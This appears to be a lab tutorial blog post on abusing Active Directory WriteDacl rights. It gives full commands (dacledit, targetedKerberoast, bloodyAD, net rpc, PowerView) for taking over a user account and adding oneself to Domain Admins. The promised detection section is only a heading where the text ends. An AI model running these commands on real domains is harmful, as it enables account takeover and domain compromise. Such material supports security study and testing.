In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the WriteDacl permission in Active Directory environments. Specifically, attackers can abuse WriteDacl permissions to gain unauthorized access or modify existing permissions to suit their objectives.

To simulate these attacks, we set up a lab environment. Moreover, we map the techniques to the MITRE ATT&CK framework to clarify the associated tactics and techniques. We also describe detection mechanisms for identifying suspicious activity related to WriteDacl attacks, along with actionable recommendations for mitigation. As a result, this overview provides security professionals with critical insights to detect and defend against these common Active Directory threats.

Table of Contents

Abusing AD-DACL- WriteDacl

WriteDacl Permission

Prerequisites

Lab Setup – User Owns WriteDacl Permission on Another User

Exploitation Phase I – User Owns WriteDacl Permission on Another User

Bloodhound – Hunting for Weak Permission

Method for Exploitation – Granting Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1110.001)

1. Linux Impacket tool – Granting Full Control
   • Linux Python Script – TargetedKerberoast
   • Linux – Change Password

Linux Net RPC – Samba

Linux Bloody AD

2. Windows PowerShell Powerview – Granting Full Control
   • Windows PowerShell Powerview – Kerberoasting
   • Windows PowerShell Powerview – Change Password

Lab Setup – User Owns WriteDacl Permission on the Domain Admin Group

Exploitation Phase II – User Owns WriteDacl Permission on a Group

Bloodhound – Hunting for Weak Permission

Method for Exploitation – Granting Full Control Followed by Account Manipulation (T1098)

1. Linux Impacket tool – Granting Full Control
   • Linux – Adding Member to the Group

Linux Net RPC – Samba

Linux Bloody AD

2. Windows PowerShell Powerview – Granting Full Control
   • Windows Net command – Adding Member to the Group

Detection & Mitigation

WriteDacl Permission

The WriteDacl permission in Active Directory allows users to modify the Discretionary Access Control List (DACL) of an AD object, giving them the ability to control object-level permissions. Consequently, an attacker can write a new Access Control Entry (ACE) to the target object’s DACL, potentially gaining full control over the target object.

Alternatively, instead of giving full control, attackers can apply the same process to allow an object to DCSync by adding two ACEs with specific Extended Rights: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Notably, granting GenericAll results in the same outcome, as it includes all ExtendedRights, including those necessary for DCSync to function.

WriteDacl permissions serve various purposes depending on the type of Active Directory object involved. For example, when applied to a group, they allow attackers to add members to that group. Conversely, on a user object, these permissions grant full control over that user’s account. Likewise, when applied to a computer object, they enable complete control over the machine. Finally, applying WriteDacl to a domain object allows an attacker to perform a DCSync operation—a particularly dangerous privilege if exploited.

Prerequisites

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Bloodhound, Net RPC, Powerview, BloodyAD, Impacket
• Windows 10/11 – As Client

Lab Setup – User Owns WriteDacl Permission on Another User

Here, in this lab setup, we will create two users’ Aarti and Komal, where the user Komal has WriteDacl permission over the Aarti user.

Create the AD Environment and User accounts

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

• Install Windows Server (2016 or 2019 recommended).
• Promote it to a Domain Controller by adding the Active Directory Domain Services
• Set up the domain (e.g., local).

User Accounts:

• Create two AD user accounts named Aarti and Komal.

net user aarti Password@1 /add /domain
net user komal Password@1 /add /domain

Assign the “WriteDacl” Privilege:

• Open Active Directory Users and Computers (ADUC) on the Domain Controller.
• Enable the Advanced Features view by clicking on View > Advanced Features.
• Locate User Aarti in the Users
• Right-click on Aarti User and go to Properties.

     

• Go to the Security tab, and click on Add button

• In the “Enter the object name to select” box, type Komal and click Check Names and click on OK.
• Select Komal user and in the Permissionssection, and click on Advanced

     

• In the Advanced security settings box, double-click on Komal user’s permission entry.
• In the Permissionssection, check the box for Modify permission
• Apply the settings.

     

At this point, Komal now has WriteDacl permission for Aarti user.

Exploitation Phase I – User Owns WriteDacl Permission on Another User

Bloodhound – Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Komal has the WriteDacl permission for Aarti user.

bloodhound-python -u komal -p Password@1 -ns 192.168.1.3 -d ignite.local -c All

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

From the graph it can be observed that the Komal user owns WriteDacl privilege on Aarti user.

Method for Exploitation – Granting Full Control Followed by Kerberoasting (T1558.003) or Change Password (T1110.001)

Attackers can exploit this method when they control an object that has WriteDacl permission over another object.

Linux Impacket tool – Granting Full Control

From UNIX-like systems, attackers can grant full control using Impacket‘s dacledit.py (Python).

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'komal' -target-dn 'CN=aarti,CN=Users,DC=ignite,DC=local' 'ignite.local'/'komal':'Password@1' -dc-ip 192.168.1.3

With the help of dacledit, attackers can successfully modify the DACL, giving the user Komal full control over the user Aarti.

As a result, once the user has full control over the target, they can either perform Kerberoasting or change the target’s password without knowing the current password (ForceChangePassword)

Linux Python Script – TargetedKerberoast

From UNIX-like systems, attackers can execute targeted Kerberoasting using targetedKerberoast.py (Python).

./targetedKerberoast.py --dc-ip '192.168.1.3' -v -d 'ignite.local' -u 'komal' -p 'Password@1'

Furthermore, tools like John the Ripper and dictionaries such as RockYou can help brute-force weak passwords extracted through Kerberoasting.

Linux – Change Password

Linux Net RPC – Samba

Attackers can also change the password from UNIX-like systems using net, a tool for administering Samba and CIFS/SMB clients:

net rpc password aarti 'Password@987' -U ignite.local/komal%'Password@1' -S 192.168.1.3

 Linux Bloody AD

Alternatively, attackers can use bloodyAD to reset the user password:

bloodyAD --host "192.168.1.3" -d "ignite.local" -u "komal" -p "Password@1" set password "aarti" "Password@789"

Windows PowerShell Powerview – Granting Full Control

From a Windows system, attackers can grant full control using the Add-DomainObjectAcl function from the PowerView module:

powershell -ep bypass
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "aarti" -PrincipalIdentity "komal"

 

With Add-DomainObjectAcl, the DACL for the target object is modified, allowing the Komal user to gain full control over Aarti user.

Consequently, with full control, the attacker can either perform Kerberoasting or change the password without needing the target’s current password (ForceChangePassword)

Windows PowerShell Powerview – Kerberoasting

On Windows machines, attackers can achieve Kerberoasting using the Set-DomainObject and Get-DomainSPNTicket commands from PowerView:

Set-DomainObject -Identity 'aarti' -Set @{serviceprincipalname='nonexistent/hacking'}
Get-DomainUser 'aarti' | Select serviceprincipalname
$User = Get-DomainUser 'aarti'
$User | Get-DomainSPNTicket

Windows PowerShell Powerview – Change Password

Linux Net RPC – Samba

Attackers can also change the password of a user using the Set-DomainUserPassword cmdlet from PowerView:

$NewPassword = ConvertTo-SecureString 'Password1234' -AsPlainText -Force
Set-DomainUserPassword -Identity 'aarti' -AccountPassword $NewPassword

Lab Setup – User Owns WriteDacl Permission on the Domain Admin Group

Create the AD Environment:

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:

• Install Windows Server (2016 or 2019 recommended).
• Promote it to a Domain Controller by adding the Active Directory Domain Services
• Set up the domain (e.g., local).

User Accounts:

• Create a standard user account named Rudra.

net user rudra Password@1 /add /domain

Assign the “WriteDacl” Privilege to Rudra:

Once your Active Directory (AD) environment is properly configured, you must assign the WriteDacl privilege to the user Rudra for the Domain Admins group. This privilege enables Rudra to modify permissions and eventually add themselves to the Domain Admins group.

Steps:

• First, open Active Directory Users and Computers (ADUC) on the Domain Controller.
• Next, enable the Advanced Features view by clicking on View > Advanced Features.
• Then, locate the Domain Admins group in the Users container.
• After that, right-click on Domain Admins and go to Properties.

     

• Navigate to the Security tab, and click on Add button

     

• In the “Enter the object name to select” box, type Rudraand click Check Names and click on OK.
• Select Rudra user and in the Permissionssection, and click on Advanced option

     

• In the Advanced security settings box, double-click on Rudra user’s permission entry.
• In the Permissionssection, check the box for Modify permission
• Finally, apply the settings to save the changes.

     

At this point, Rudra now has WriteDacl rights over the Domain Admins group, meaning they can add themselves to the group.

Exploitation Phase II – User Owns WriteDacl Permission on a Group

Bloodhound – Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Rudra has the WriteDacl permission on the Domain Admins group.

bloodhound-python -u rudra -p Password@1 -ns 192.168.1.3 -d ignite.local -c All

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

Thus, it has shown the Rudra User has WriteDacl privilege to Domain Admin group.

Method for Exploitation – Granting Full Control Followed by Account Manipulation (T1098)

Linux Impacket tool – Granting Full Control

From UNIX-like systems, this can be done with Impacket‘s dacledit.py (Python), alternatively Impacket-dacledit.

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'rudra' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'rudra':'Password@1' -dc-ip 192.168.1.3

With the help of dacledit, the DACL for this object is successfully modified, rudra user now have full Control over the group.

Linux – Adding Member to the Group

Linux Net RPC – Samba

The tester can abuse this permission by adding Rudra User into Domain Admin group and list the domain admin members to ensure that Rudra Users becomes Domain Admin.

net rpc group addmem "Domain Admins" rudra -U ignite.local/rudra%'Password@1' -S 192.168.1.3

Linux Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.3" -d "ignite.local" -u "rudra" -p "Password@1" add groupMember "Domain Admins" "rudra"

Windows PowerShell Powerview – Granting Full Control

From a Windows system, this can be achieved with Add-DomainObjectAcl (PowerView module).

powershell -ep bypass
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Domain Admins" -PrincipalIdentity "rudra"

Windows Net command – Adding Member to the Group

This can be achieved with a native command line, using windows net command.

net group "domain admins" rudra /add /domain

thus, from user property we can see Rudra user has become the member of domain admin.

Detection & Mitigation